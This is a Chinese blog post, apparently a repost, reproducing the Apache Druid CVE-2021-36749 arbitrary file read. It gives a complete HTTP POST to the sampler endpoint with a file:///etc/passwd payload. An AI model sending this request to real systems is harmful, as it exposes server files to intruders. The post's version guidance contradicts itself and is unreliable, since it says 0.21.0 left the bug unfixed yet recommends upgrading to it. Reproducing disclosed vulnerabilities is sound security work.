Apache Druid LoadData 任意文件读取漏洞 CVE-2021-36749

业界资讯 2023-07-28 20:37:12 阅读次数: 0

Apache Druid LoadData 任意文件读取漏洞 CVE-2021-36749

0x01 漏洞简介

在 Druid 系统中，InputSource 用于从某个数据源读取数据。但是，HTTP InputSource 允许经过身份验证的用户以 Druid 服务器进程的权限从其他来源读取数据，例如本地文件系统。

这不是用户直接访问 Druid 时的权限提升，因为 Druid 还提供了 Local InputSource，它允许相同级别的访问。但是当用户通过允许用户指定 HTTP InputSource 而不是 Local InputSource 的应用程序间接与 Druid 交互时，这是有问题的。

在这种情况下，用户可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。这个问题之前提到过，根据 CVE-2021-26920 在 0.21.0 中已修复，但在 0.21.0 或 0.21.1 中未修复。

0x02 影响范围

影响范围 : Apache Druid < 0.21.0

0x03 漏洞复现

URLS写入payload

file:///etc/passwd

完整数据包

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 423
Origin: http://127.0.0.1:8888
Connection: close
Referer: http://127.0.0.1:8888/unified-console.html

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["file:///etc/passwd"]},"inputFormat":{"type":"regex","pattern":"(.*)","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{}},"tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

0x04 修复

升级到0.21.0或更高版本

猜你喜欢

转载自blog.csdn.net/god_zzZ/article/details/121383301

Apache Druid LoadData 任意文件读取漏洞 CVE-2021-36749

Apache Druid 任意文件读取 CVE-2021-36749 复现

【漏洞复现-druid-任意文件读取】vulfocus/druid-cve_2021_36749

【高危】Apache Airflow Spark Provider 任意文件读取漏洞（CVE-2023-40272）

Grafana任意文件读取漏洞（CVE-2021-43798）

vulhub漏洞复现-Apache Flink(CVE-2020-17518 CVE-2020-17519)任意文件上传/读取

Apache-Solr 任意文件读取漏洞复现

CVE-2018-3760漏洞复现(任意文件读取)

CVE-2018-7490-uWSGI 任意文件读取漏洞

ThinkAdmin任意文件读取漏洞（CVE-2020-25540）

ImageMagick任意文件读取漏洞(CVE-2022-44268)

【漏洞复现】Grafana任意文件读取漏洞(CVE-2021-43798)

Lanproxy 任意文件读取漏洞 (CVE-2021-3019)复现

Lanproxy 任意文件读取漏洞 CVE-2021-3019复现

CVE-2021-3019【Lanproxy 任意文件读取漏洞复现】

Grafana 任意文件读取漏洞复现(CVE-2021-43798)

CVE-2021-43798 Grafana 未授权任意文件读取漏洞

Grafana任意文件读取漏洞复现（CVE-2021-43798）

Apache ActiveMQ任意文件写入漏洞（CVE-2016-3088）复现

Apache Flink(CVE-2020-17518/17519)任意文件上传和路径遍历漏洞复现

Apache Solr stream.url SSRF与任意文件读取漏洞(附pythonEXP脚本)

【中危】Apache Airflow Drill Provider ＜ 2.4.3 存在任意文件读取漏洞

PHPMailer 任意文件读取漏洞 CVE-2017-5223 漏洞复现

Gitlab 任意文件读取漏洞 CVE-2016-9086 漏洞复现

vulhub漏洞复现-mini_httpd(CVE-2018-18778) 任意文件读取漏洞

Apache Druid RCE(CVE-2021-25646)复现附漏洞检测POC

【漏洞复现】Apache Druid 远程代码执行 CVE-2021-25646

Apache Druid远程命令执行漏洞复现(CVE-2021-25646)

Apache Tomcat 曝文件包含漏洞：攻击者可利用该漏洞读取webapp目录下的任意文件

CVE-2019-4505：WebSphere任意文件读取漏洞警报

今日推荐

Apache Doris 2.0.10 版本正式发布！

开源日报 | 大模型开战；大模型独角兽被曝卖身；周鸿祎建议谷歌开源所有产品；最大开源AI社区提供1000万美元共享GPU

开源日报 | Chrome内置Gemini的意义不在于Gemini；中国AI追随之路的五大误区；ECharts创始人“下海”养鱼；谷歌I/O开发者大会什么都有，只是没有惊喜

微软回应中国区AI团队“打包赴美”传闻

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

周排行

阿里云短信服务平台注册

Windows下的字符串处理(1)

sqoop: mysql导入数据到hdfs, hive, hbase

commons.lang中常用的工具类

离线安装PostgreSQL11.6

使用PyTorch简单实现卷积神经网络模型

一文彻底搞定谱聚类

一道面试题引发的血案

One Chat for Mac(聊天工具)

TCP/IP的底层队列是如何实现的？

每日归档

更多

2024-05-17(34)

2024-05-16(6)

2024-05-15(24)

2024-05-14(0)

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)